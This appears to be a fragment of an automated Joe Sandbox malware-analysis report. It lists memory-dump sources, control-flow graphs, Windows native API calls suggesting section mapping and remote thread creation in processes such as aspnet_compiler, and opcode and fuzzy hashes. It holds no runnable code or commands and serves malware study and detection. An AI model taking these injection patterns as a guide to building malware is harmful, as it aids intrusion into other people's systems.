                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1546783058-0
                                                                                                                                                    • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                                                                                                                    • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                                                                                                                                                    • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                                                                                                                    • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 178 402f5d-402f81 179 4030b4-4030b9 178->179 180 402f87-402f9f 178->180 180->179 181 402fa5-402fb6 180->181 182 402fb8-402fc1 181->182 183 402fc6-402fd4 182->183 183->183 184 402fd6-402fdd 183->184 185 402fff-403006 184->185 186 402fdf-402ffe 184->186 187 403028-40302b 185->187 188 403008-403027 185->188 186->185 189 403034 187->189 190 40302d-403030 187->190 188->187 189->182 192 403036-40303b 189->192 190->189 191 403032 190->191 191->192 192->179 193 40303d-403040 192->193 193->179 194 403042-4030b1 RtlCreateUserThread NtTerminateProcess 193->194 194->179
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1921587553-0
                                                                                                                                                    • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                    • Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
                                                                                                                                                    • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                    • Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 195 4030bf-4030cf 196 4030d1-403109 195->196 197 403055-4030b1 RtlCreateUserThread NtTerminateProcess 195->197 201 403113-403118 196->201 202 40310b 196->202 198 4030b4-4030b9 197->198 203 40311a 201->203 204 40311f-403141 call 4011db 201->204 202->201 205 40310d-403110 202->205 203->204 206 40311c 203->206 211 403145 204->211 205->201 206->204 211->211
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1921587553-0
                                                                                                                                                    • Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                                                                                                                    • Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
                                                                                                                                                    • Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                                                                                                                    • Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 212 4018c5-40190b call 401164 Sleep call 4013cc 222 40191a-401920 212->222 223 40190d-401915 call 4014bf 212->223 226 401931 222->226 227 401928-40192d 222->227 223->222 226->227 228 401934-40194f 226->228 227->228 233 401952-40195b call 401164 228->233 234 401948-40194b 228->234 234->233
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                      • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                      • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                    • String ID: zOji
                                                                                                                                                    • API String ID: 4152845823-4118548424
                                                                                                                                                    • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                                                                                                                    • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                                                                                                                                                    • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                                                                                                                    • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 237 4018a6-4018c3 241 4018d4 237->241 242 4018c8-40190b call 401164 Sleep call 4013cc 237->242 241->242 252 40191a-401920 242->252 253 40190d-401915 call 4014bf 242->253 256 401931 252->256 257 401928-40192d 252->257 253->252 256->257 258 401934-40194f 256->258 257->258 263 401952-40195b call 401164 258->263 264 401948-40194b 258->264 264->263
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                      • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                      • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4152845823-0
                                                                                                                                                    • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                                                                                                                    • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                                                                                                                                                    • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                                                                                                                    • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 267 4018be-4018c3 271 4018d4 267->271 272 4018c8-40190b call 401164 Sleep call 4013cc 267->272 271->272 282 40191a-401920 272->282 283 40190d-401915 call 4014bf 272->283 286 401931 282->286 287 401928-40192d 282->287 283->282 286->287 288 401934-40194f 286->288 287->288 293 401952-40195b call 401164 288->293 294 401948-40194b 288->294 294->293
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                      • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                      • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4152845823-0
                                                                                                                                                    • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                                                                                                                    • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                                                                                                                                                    • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                                                                                                                    • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 297 4018b1-4018b3 298 401903-40190b call 4013cc 297->298 299 4018b5-4018c3 297->299 305 40191a-401920 298->305 306 40190d-401915 call 4014bf 298->306 303 4018d4 299->303 304 4018c8-401900 call 401164 Sleep 299->304 303->304 304->298 312 401931 305->312 313 401928-40192d 305->313 306->305 312->313 316 401934-40194f 312->316 313->316 322 401952-40195b call 401164 316->322 323 401948-40194b 316->323 323->322
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                    • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                                                                                                                    • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                                                                                                                                                    • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                                                                                                                    • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 326 4018c2-40190b call 401164 Sleep call 4013cc 338 40191a-401920 326->338 339 40190d-401915 call 4014bf 326->339 342 401931 338->342 343 401928-40192d 338->343 339->338 342->343 344 401934-40194f 342->344 343->344 349 401952-40195b call 401164 344->349 350 401948-40194b 344->350 350->349
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                      • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                      • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4152845823-0
                                                                                                                                                    • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                                                    • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                                                                                                                                    • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                                                    • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 353 4018da-40190b call 401164 Sleep call 4013cc 360 40191a-401920 353->360 361 40190d-401915 call 4014bf 353->361 364 401931 360->364 365 401928-40192d 360->365 361->360 364->365 366 401934-40194f 364->366 365->366 371 401952-40195b call 401164 366->371 372 401948-40194b 366->372 372->371
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                      • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                      • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4152845823-0
                                                                                                                                                    • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                                                    • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                                                                                                                                                    • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                                                    • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 691a887aca440bf0981980ffb69ebb9393fd1489103dfcc893f71312a483f854
                                                                                                                                                    • Instruction ID: c0db0efe21a2bd9059c32bcfc07a19332ad4189998e6c0f0d4dc2cb712a40848
                                                                                                                                                    • Opcode Fuzzy Hash: 691a887aca440bf0981980ffb69ebb9393fd1489103dfcc893f71312a483f854
                                                                                                                                                    • Instruction Fuzzy Hash: 3C41332100ABD58FC7138F304A264A67F64FD1372171D00EFD8809B6A3C73A5A07C79A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                                                                                                                    • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                                                                                                                                                    • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                                                                                                                    • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                                                                                                                    • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                                                                                                                                                    • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                                                                                                                    • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                                                                                                                    • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                                                                                                                                                    • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                                                                                                                    • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                                                                                                                    • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                                                                                                                                                    • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                                                                                                                    • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                                                                                                                    • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                                                                                                                                                    • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                                                                                                                    • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                                                                                                                    • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                                                                                                                                                    • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                                                                                                                    • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000001E.00000002.522922595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                                                                                                                    • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                                                                                                                                                    • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                                                                                                                    • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:18.9%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:8
                                                                                                                                                    Total number of Limit Nodes:1

                                                                                                                                                    Callgraph

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 403003-40302b 1 403034 0->1 2 40302d-403030 0->2 4 403036-40303b 1->4 2->1 3 403032 2->3 3->4 5 4030b4-4030b9 4->5 6 40303d-403040 4->6 6->5 7 403042-4030b1 RtlCreateUserThread NtTerminateProcess 6->7 7->5
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000022.00000002.568028419.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Offset: 00403000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_34_2_403000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1921587553-0
                                                                                                                                                    • Opcode ID: 94977c7c957da28ebdb49773db0d725be25098902dae5918022c0f55c4de826c
                                                                                                                                                    • Instruction ID: e9ffd69ad77dc161c830ca1f5e4fbd3b11cc50034e2b0388e00130c93396e596
                                                                                                                                                    • Opcode Fuzzy Hash: 94977c7c957da28ebdb49773db0d725be25098902dae5918022c0f55c4de826c
                                                                                                                                                    • Instruction Fuzzy Hash: 3E112231529E4C4BD364AF6CA4453A6FAD5F788364FA503AEE808C23C8E738C90182C6

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 8 4030bf-4030cf 9 4030d1-403109 8->9 10 403055-4030b1 RtlCreateUserThread NtTerminateProcess 8->10 14 403113-403118 9->14 15 40310b 9->15 12 4030b4-4030b9 10->12 17 40311a 14->17 18 40311f-403141 14->18 15->14 16 40310d-403110 15->16 16->14 17->18 19 40311c 17->19 23 403145 18->23 19->18 23->23
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000022.00000002.568028419.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Offset: 00403000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_34_2_403000_aspnet_compiler.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1921587553-0
                                                                                                                                                    • Opcode ID: 68039ed0c8a162d12ca09812c6278e271bdb2fbceb5e85ccc71b30fa0e8d246c
                                                                                                                                                    • Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
                                                                                                                                                    • Opcode Fuzzy Hash: 68039ed0c8a162d12ca09812c6278e271bdb2fbceb5e85ccc71b30fa0e8d246c
                                                                                                                                                    • Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000024.00000002.582316455.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_36_2_1b0000_vtjrhji.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 8!p
                                                                                                                                                    • API String ID: 0-2808226621
                                                                                                                                                    • Opcode ID: 4d096564618acf1124d36d06770a9a62793d855c8afdb9d21c177758ed81b14e
                                                                                                                                                    • Instruction ID: d4a7317497f3bd300b96bcd5ee02e91f0dfbd56fcc1c95a3f055b540fbf511b7
                                                                                                                                                    • Opcode Fuzzy Hash: 4d096564618acf1124d36d06770a9a62793d855c8afdb9d21c177758ed81b14e
                                                                                                                                                    • Instruction Fuzzy Hash: 6CF0A0792016008FD702EBA8F891BAABBE59F84315F54016CE006CB3A5DB609D058B80
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000024.00000002.582316455.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_36_2_1b0000_vtjrhji.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 8!p
                                                                                                                                                    • API String ID: 0-2808226621
                                                                                                                                                    • Opcode ID: fea5375f5f33d6e68514ae3fdcc0550ef3d7c361e8450714c257121379248f0d
                                                                                                                                                    • Instruction ID: dec617530401242cf1afbfe55e06a0a78430c99105172dba0ee85beb689ed19f
                                                                                                                                                    • Opcode Fuzzy Hash: fea5375f5f33d6e68514ae3fdcc0550ef3d7c361e8450714c257121379248f0d
                                                                                                                                                    • Instruction Fuzzy Hash: A3E09A382012008FD701FBA8E581A6AB3E9AFC8720F104468E5098B3A4CB20AC458BC0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000024.00000002.582316455.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_36_2_1b0000_vtjrhji.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 54f9cfac694de82b5e2e6a36ee6ceff7f66f8ea7f4c59d8693710889141e379c
                                                                                                                                                    • Instruction ID: a715e25008d9d04651aa5485325c53e075716817b1a3e47ec416e440197d7b00
                                                                                                                                                    • Opcode Fuzzy Hash: 54f9cfac694de82b5e2e6a36ee6ceff7f66f8ea7f4c59d8693710889141e379c
                                                                                                                                                    • Instruction Fuzzy Hash: A671D135A00304CFDB11EFB4E4956AEB7E6EFC8314F108569E8059B351DB71AE46CB81
                                                                                                                                                    Memory Dump Source
